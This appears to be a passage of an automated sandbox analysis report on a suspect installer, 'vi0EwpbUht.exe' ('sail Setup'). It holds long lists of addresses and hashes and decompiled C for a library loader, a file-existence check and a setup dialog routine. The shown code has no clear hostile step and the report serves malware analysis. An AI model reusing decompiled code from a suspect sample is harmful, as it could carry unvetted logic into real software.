                                                                                                                          0x00406380
                                                                                                                          0x0040636b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040638c
                                                                                                                          0x00406390
                                                                                                                          0x00406397
                                                                                                                          0x0040639a
                                                                                                                          0x0040639d
                                                                                                                          0x00406392
                                                                                                                          0x00406392
                                                                                                                          0x00406392
                                                                                                                          0x004063a0
                                                                                                                          0x004063a3
                                                                                                                          0x004063a6
                                                                                                                          0x004063a6
                                                                                                                          0x004063a9
                                                                                                                          0x004063ac
                                                                                                                          0x004063af
                                                                                                                          0x004063af
                                                                                                                          0x004063b2
                                                                                                                          0x004063b9
                                                                                                                          0x004063be
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040644c
                                                                                                                          0x0040644c
                                                                                                                          0x00406450
                                                                                                                          0x004067ee
                                                                                                                          0x00000000
                                                                                                                          0x004067ee
                                                                                                                          0x00406456
                                                                                                                          0x00406459
                                                                                                                          0x0040645c
                                                                                                                          0x00406460
                                                                                                                          0x00406463
                                                                                                                          0x00406469
                                                                                                                          0x0040646b
                                                                                                                          0x0040646b
                                                                                                                          0x0040646b
                                                                                                                          0x0040646e
                                                                                                                          0x00406471
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004064cf
                                                                                                                          0x004064cf
                                                                                                                          0x004064d3
                                                                                                                          0x004067fa
                                                                                                                          0x00000000
                                                                                                                          0x004067fa
                                                                                                                          0x004064d9
                                                                                                                          0x004064dc
                                                                                                                          0x004064df
                                                                                                                          0x004064e3
                                                                                                                          0x004064e6
                                                                                                                          0x004064ec
                                                                                                                          0x004064ee
                                                                                                                          0x004064ee
                                                                                                                          0x004064ee
                                                                                                                          0x004064f1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040629f
                                                                                                                          0x0040629f
                                                                                                                          0x004062a2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004065de
                                                                                                                          0x004065e2
                                                                                                                          0x00406604
                                                                                                                          0x00406607
                                                                                                                          0x00406611
                                                                                                                          0x00000000
                                                                                                                          0x00406611
                                                                                                                          0x004065e4
                                                                                                                          0x004065e7
                                                                                                                          0x004065eb
                                                                                                                          0x004065ee
                                                                                                                          0x004065ee
                                                                                                                          0x004065f1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040669b
                                                                                                                          0x0040669f
                                                                                                                          0x004066bd
                                                                                                                          0x004066bd
                                                                                                                          0x004066bd
                                                                                                                          0x004066c4
                                                                                                                          0x004066cb
                                                                                                                          0x004066d2
                                                                                                                          0x004066d2
                                                                                                                          0x00000000
                                                                                                                          0x004066d2
                                                                                                                          0x004066a1
                                                                                                                          0x004066a4
                                                                                                                          0x004066a7
                                                                                                                          0x004066aa
                                                                                                                          0x004066b1
                                                                                                                          0x004065f5
                                                                                                                          0x004065f5
                                                                                                                          0x004065f8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040678c
                                                                                                                          0x0040678f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063c6
                                                                                                                          0x004063c8
                                                                                                                          0x004063cf
                                                                                                                          0x004063d0
                                                                                                                          0x004063d2
                                                                                                                          0x004063d5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063dd
                                                                                                                          0x004063e0
                                                                                                                          0x004063e3
                                                                                                                          0x004063e5
                                                                                                                          0x004063e7
                                                                                                                          0x004063e7
                                                                                                                          0x004063e8
                                                                                                                          0x004063eb
                                                                                                                          0x004063f2
                                                                                                                          0x004063f5
                                                                                                                          0x00406403
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066d9
                                                                                                                          0x004066d9
                                                                                                                          0x004066dc
                                                                                                                          0x004066e3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066e8
                                                                                                                          0x004066e8
                                                                                                                          0x004066ec
                                                                                                                          0x00406824
                                                                                                                          0x00000000
                                                                                                                          0x00406824
                                                                                                                          0x004066f2
                                                                                                                          0x004066f5
                                                                                                                          0x004066f8
                                                                                                                          0x004066fc
                                                                                                                          0x004066ff
                                                                                                                          0x00406705
                                                                                                                          0x00406707
                                                                                                                          0x00406707
                                                                                                                          0x00406707
                                                                                                                          0x0040670a
                                                                                                                          0x0040670d
                                                                                                                          0x0040670d
                                                                                                                          0x0040670d
                                                                                                                          0x0040670d
                                                                                                                          0x00406710
                                                                                                                          0x00406710
                                                                                                                          0x00406714
                                                                                                                          0x00406774
                                                                                                                          0x00406777
                                                                                                                          0x0040677c
                                                                                                                          0x0040677d
                                                                                                                          0x0040677f
                                                                                                                          0x00406781
                                                                                                                          0x00406784
                                                                                                                          0x00000000
                                                                                                                          0x00406784
                                                                                                                          0x00406716
                                                                                                                          0x0040671c
                                                                                                                          0x0040671f
                                                                                                                          0x00406722
                                                                                                                          0x00406725
                                                                                                                          0x00406728
                                                                                                                          0x0040672b
                                                                                                                          0x0040672e
                                                                                                                          0x00406731
                                                                                                                          0x00406734
                                                                                                                          0x00406737
                                                                                                                          0x00406750
                                                                                                                          0x00406753
                                                                                                                          0x00406756
                                                                                                                          0x00406759
                                                                                                                          0x0040675d
                                                                                                                          0x0040675f
                                                                                                                          0x0040675f
                                                                                                                          0x00406760
                                                                                                                          0x00406763
                                                                                                                          0x00406739
                                                                                                                          0x00406739
                                                                                                                          0x00406741
                                                                                                                          0x00406746
                                                                                                                          0x00406748
                                                                                                                          0x0040674b
                                                                                                                          0x0040674b
                                                                                                                          0x00406766
                                                                                                                          0x0040676d
                                                                                                                          0x00000000
                                                                                                                          0x0040676f
                                                                                                                          0x00000000
                                                                                                                          0x0040676f
                                                                                                                          0x00000000
                                                                                                                          0x0040640b
                                                                                                                          0x0040640e
                                                                                                                          0x00406444
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406577
                                                                                                                          0x00406577
                                                                                                                          0x0040657a
                                                                                                                          0x0040657c
                                                                                                                          0x00406806
                                                                                                                          0x00000000
                                                                                                                          0x00406806
                                                                                                                          0x00406582
                                                                                                                          0x00406585
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040658b
                                                                                                                          0x0040658f
                                                                                                                          0x00406592
                                                                                                                          0x00406592
                                                                                                                          0x00406592
                                                                                                                          0x00000000
                                                                                                                          0x00406592
                                                                                                                          0x00406410
                                                                                                                          0x00406412
                                                                                                                          0x00406414
                                                                                                                          0x00406416
                                                                                                                          0x00406419
                                                                                                                          0x0040641a
                                                                                                                          0x0040641c
                                                                                                                          0x0040641e
                                                                                                                          0x00406421
                                                                                                                          0x00406424
                                                                                                                          0x0040643a
                                                                                                                          0x0040643f
                                                                                                                          0x00406477
                                                                                                                          0x00406477
                                                                                                                          0x0040647b
                                                                                                                          0x004064a7
                                                                                                                          0x004064a9
                                                                                                                          0x004064b0
                                                                                                                          0x004064b3
                                                                                                                          0x004064b6
                                                                                                                          0x004064b6
                                                                                                                          0x004064bb
                                                                                                                          0x004064bb
                                                                                                                          0x004064bd
                                                                                                                          0x004064c0
                                                                                                                          0x004064c7
                                                                                                                          0x004064ca
                                                                                                                          0x004064f7
                                                                                                                          0x004064f7
                                                                                                                          0x004064fa
                                                                                                                          0x004064fd
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00000000
                                                                                                                          0x00406571
                                                                                                                          0x004064ff
                                                                                                                          0x00406505
                                                                                                                          0x00406508
                                                                                                                          0x0040650b
                                                                                                                          0x0040650e
                                                                                                                          0x00406511
                                                                                                                          0x00406514
                                                                                                                          0x00406517
                                                                                                                          0x0040651a
                                                                                                                          0x0040651d
                                                                                                                          0x00406520
                                                                                                                          0x00406539
                                                                                                                          0x0040653b
                                                                                                                          0x0040653e
                                                                                                                          0x0040653f
                                                                                                                          0x00406542
                                                                                                                          0x00406544
                                                                                                                          0x00406547
                                                                                                                          0x00406549
                                                                                                                          0x0040654b
                                                                                                                          0x0040654e
                                                                                                                          0x00406550
                                                                                                                          0x00406553
                                                                                                                          0x00406557
                                                                                                                          0x00406559
                                                                                                                          0x00406559
                                                                                                                          0x0040655a
                                                                                                                          0x0040655d
                                                                                                                          0x00406560
                                                                                                                          0x00406522
                                                                                                                          0x00406522
                                                                                                                          0x0040652a
                                                                                                                          0x0040652f
                                                                                                                          0x00406531
                                                                                                                          0x00406534
                                                                                                                          0x00406534
                                                                                                                          0x00406563
                                                                                                                          0x0040656a
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x00000000
                                                                                                                          0x0040656c
                                                                                                                          0x00000000
                                                                                                                          0x0040656c
                                                                                                                          0x0040656a
                                                                                                                          0x0040647d
                                                                                                                          0x00406480
                                                                                                                          0x00406482
                                                                                                                          0x00406485
                                                                                                                          0x00406488
                                                                                                                          0x0040648b
                                                                                                                          0x0040648d
                                                                                                                          0x00406490
                                                                                                                          0x00406493
                                                                                                                          0x00406493
                                                                                                                          0x00406496
                                                                                                                          0x00406496
                                                                                                                          0x00406499
                                                                                                                          0x004064a0
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x004064a0
                                                                                                                          0x00406426
                                                                                                                          0x00406429
                                                                                                                          0x0040642b
                                                                                                                          0x0040642e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406318
                                                                                                                          0x00406318
                                                                                                                          0x0040631c
                                                                                                                          0x004067e2
                                                                                                                          0x00000000
                                                                                                                          0x004067e2
                                                                                                                          0x00406322
                                                                                                                          0x00406325
                                                                                                                          0x00406328
                                                                                                                          0x0040632b
                                                                                                                          0x0040632d
                                                                                                                          0x0040632d
                                                                                                                          0x0040632d
                                                                                                                          0x00406330
                                                                                                                          0x00406333
                                                                                                                          0x00406336
                                                                                                                          0x00406339
                                                                                                                          0x0040633c
                                                                                                                          0x0040633f
                                                                                                                          0x00406340
                                                                                                                          0x00406342
                                                                                                                          0x00406342
                                                                                                                          0x00406342
                                                                                                                          0x00406345
                                                                                                                          0x00406348
                                                                                                                          0x0040634b
                                                                                                                          0x0040634e
                                                                                                                          0x0040634e
                                                                                                                          0x0040634e
                                                                                                                          0x00406351
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406595
                                                                                                                          0x00406595
                                                                                                                          0x00406595
                                                                                                                          0x00406599
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040659f
                                                                                                                          0x004065a2
                                                                                                                          0x004065a5
                                                                                                                          0x004065a8
                                                                                                                          0x004065aa
                                                                                                                          0x004065aa
                                                                                                                          0x004065aa
                                                                                                                          0x004065ad
                                                                                                                          0x004065b0
                                                                                                                          0x004065b3
                                                                                                                          0x004065b6
                                                                                                                          0x004065b9
                                                                                                                          0x004065bc
                                                                                                                          0x004065bd
                                                                                                                          0x004065bf
                                                                                                                          0x004065bf
                                                                                                                          0x004065bf
                                                                                                                          0x004065c2
                                                                                                                          0x004065c5
                                                                                                                          0x004065c8
                                                                                                                          0x004065cb
                                                                                                                          0x004065ce
                                                                                                                          0x004065d2
                                                                                                                          0x004065d4
                                                                                                                          0x004065d7
                                                                                                                          0x00000000
                                                                                                                          0x004065d9
                                                                                                                          0x00000000
                                                                                                                          0x004065d9
                                                                                                                          0x004065d7
                                                                                                                          0x0040680c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e3b

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9b666163c1661dbd9b8a2e81cbf380ba9933516b4cb578f4d51b52d9bda143bb
                                                                                                                          • Instruction ID: ffbedf2a53f09e030cb941e21afd419a8c3069ec791793070072d3341ca218b9
                                                                                                                          • Opcode Fuzzy Hash: 9b666163c1661dbd9b8a2e81cbf380ba9933516b4cb578f4d51b52d9bda143bb
                                                                                                                          • Instruction Fuzzy Hash: 17F16571D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A86CF44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405CFF, Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405CFF(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409200);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x409204));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                                                                                                                          0x00405d07
                                                                                                                          0x00405d0a
                                                                                                                          0x00405d11
                                                                                                                          0x00405d19
                                                                                                                          0x00405d26
                                                                                                                          0x00000000
                                                                                                                          0x00405d2d
                                                                                                                          0x00405d1c
                                                                                                                          0x00405d24
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405d35

                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 310444273-0
                                                                                                                          • Opcode ID: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
                                                                                                                          • Instruction ID: d69b72dbe4010a9b48e4a262f362438d38f190b8a9031efe6831075815a54aa0
                                                                                                                          • Opcode Fuzzy Hash: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
                                                                                                                          • Instruction Fuzzy Hash: 5DE08C32A04610BBD3215B20AE0896B73A8EED9B403004C7EF615F6251D734AC11DBBA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405CD8, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405CD8(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224c8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224c8;
			}




                                                                                                                          0x00405ce3
                                                                                                                          0x00405cec
                                                                                                                          0x00000000
                                                                                                                          0x00405cf9
                                                                                                                          0x00405cef
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNELBASE(?,004224C8,00421880,004055F4,00421880,00421880,00000000,00421880,00421880,?,?,00000000,00405316,?,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000000), ref: 00405CE3
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405CEF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2295610775-0
                                                                                                                          • Opcode ID: eaa6d706d35b9193dbeff2470bba944fadabcf5bc74d52a04f68ed274a91c94e
                                                                                                                          • Instruction ID: 9a18407f5d3c0b203e51d924b64f4f6f4a008a27543408caa796c3d3b713bef8
                                                                                                                          • Opcode Fuzzy Hash: eaa6d706d35b9193dbeff2470bba944fadabcf5bc74d52a04f68ed274a91c94e
                                                                                                                          • Instruction Fuzzy Hash: 91D0C93594D620ABD6012728AD0884B6A589B153317508B32F46AE22E0C7748C529AA9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004038BC, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 84%
                                                                                                                          			E004038BC(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42045c = _t35;
					if(_t115 == 0x110) {
						 *0x423e88 = _t125;
						 *0x420470 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f438 = _t91;
						E00403D8F(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423668); // executed
						 *0x42364c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42045c = 1;
					}
					_t122 =  *0x4091a4; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ea0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403DDB(0x40b);
						while(1) {
							_t37 =  *0x42045c;
							 *0x4091a4 =  *0x4091a4 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091a4; // 0xffffffff
							__eflags = _t39 -  *0x423ea4; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42364c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x423ea4; // 0x2
							__eflags =  *0x4091a4 - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E004059FF(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403D8F(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403D8F(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403D8F(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f0c - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403DB1(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f438, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f0c - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x420470);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f438);
							}
							E00403DC4();
							E004059DD(0x420478, "sail Setup");
							E004059FF(0x420478, _t125, _t130,  &(0x420478[lstrlenA(0x420478)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420478);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423658);
									 *0x41fc48 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423e80,  *_t130 +  *0x423660 & 0x0000ffff, _t125,  *(0x4091a8 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423658 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403D8F(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423658, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42364c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423658, 8);
									E00403DDB(0x405);
									goto L58;
								}
								__eflags =  *0x423f0c - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x423f00 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423658);
						 *0x423e88 = _t133;
						EndDialog(_t125,  *0x41f840);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423658, 0x40f, 0, 1);
						__eflags =  *0x42364c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420450, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420450,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403DF6(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423658, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f0c - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f840 = 1;
											L21:
											_push(0x78);
											L22:
											E00403D68();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f840 = _t127;
										goto L21;
									}
									__eflags =  *0x4091a4 - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423658);
						 *0x423658 = _a12;
						L58:
						if( *0x421478 == _t133) {
							_t142 =  *0x423658 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x421478 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                                                                                                                          0x004038c5
                                                                                                                          0x004038ce
                                                                                                                          0x00403a0f
                                                                                                                          0x00403a13
                                                                                                                          0x00403a17
                                                                                                                          0x00403a19
                                                                                                                          0x00403a1e
                                                                                                                          0x00403a29
                                                                                                                          0x00403a34
                                                                                                                          0x00403a39
                                                                                                                          0x00403a3b
                                                                                                                          0x00403a3d
                                                                                                                          0x00403a40
                                                                                                                          0x00403a45
                                                                                                                          0x00403a53
                                                                                                                          0x00403a60
                                                                                                                          0x00403a67
                                                                                                                          0x00403a67
                                                                                                                          0x00403a68
                                                                                                                          0x00403a68
                                                                                                                          0x00403a6d
                                                                                                                          0x00403a73
                                                                                                                          0x00403a7a
                                                                                                                          0x00403a80
                                                                                                                          0x00403a82
                                                                                                                          0x00403ac2
                                                                                                                          0x00403ac7
                                                                                                                          0x00403acc
                                                                                                                          0x00403acc
                                                                                                                          0x00403ad1
                                                                                                                          0x00403ada
                                                                                                                          0x00403adc
                                                                                                                          0x00403ae1
                                                                                                                          0x00403ae7
                                                                                                                          0x00403aeb
                                                                                                                          0x00403aeb
                                                                                                                          0x00403af0
                                                                                                                          0x00403af6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403afc
                                                                                                                          0x00403b01
                                                                                                                          0x00403b07
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403b10
                                                                                                                          0x00403b18
                                                                                                                          0x00403b1d
                                                                                                                          0x00403b20
                                                                                                                          0x00403b26
                                                                                                                          0x00403b2b
                                                                                                                          0x00403b2e
                                                                                                                          0x00403b34
                                                                                                                          0x00403b39
                                                                                                                          0x00403b3c
                                                                                                                          0x00403b42
                                                                                                                          0x00403b4a
                                                                                                                          0x00403b50
                                                                                                                          0x00403b56
                                                                                                                          0x00403b5a
                                                                                                                          0x00403b61
                                                                                                                          0x00403b61
                                                                                                                          0x00403b61
                                                                                                                          0x00403b6b
                                                                                                                          0x00403b7d
                                                                                                                          0x00403b89
                                                                                                                          0x00403b8e
                                                                                                                          0x00403b98
                                                                                                                          0x00403b9e
                                                                                                                          0x00403ba0
                                                                                                                          0x00403ba5
                                                                                                                          0x00403ba2
                                                                                                                          0x00403ba2
                                                                                                                          0x00403ba2
                                                                                                                          0x00403bb5
                                                                                                                          0x00403bcd
                                                                                                                          0x00403bcf
                                                                                                                          0x00403bd5
                                                                                                                          0x00403bea
                                                                                                                          0x00403bd7
                                                                                                                          0x00403be0
                                                                                                                          0x00403be2
                                                                                                                          0x00403be2
                                                                                                                          0x00403bf0
                                                                                                                          0x00403c00
                                                                                                                          0x00403c11
                                                                                                                          0x00403c18
                                                                                                                          0x00403c1e
                                                                                                                          0x00403c22
                                                                                                                          0x00403c27
                                                                                                                          0x00403c29
                                                                                                                          0x00000000
                                                                                                                          0x00403c2f
                                                                                                                          0x00403c2f
                                                                                                                          0x00403c31
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403c37
                                                                                                                          0x00403c3b
                                                                                                                          0x00403c60
                                                                                                                          0x00403c66
                                                                                                                          0x00403c6c
                                                                                                                          0x00403c6e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403c94
                                                                                                                          0x00403c9a
                                                                                                                          0x00403c9c
                                                                                                                          0x00403ca1
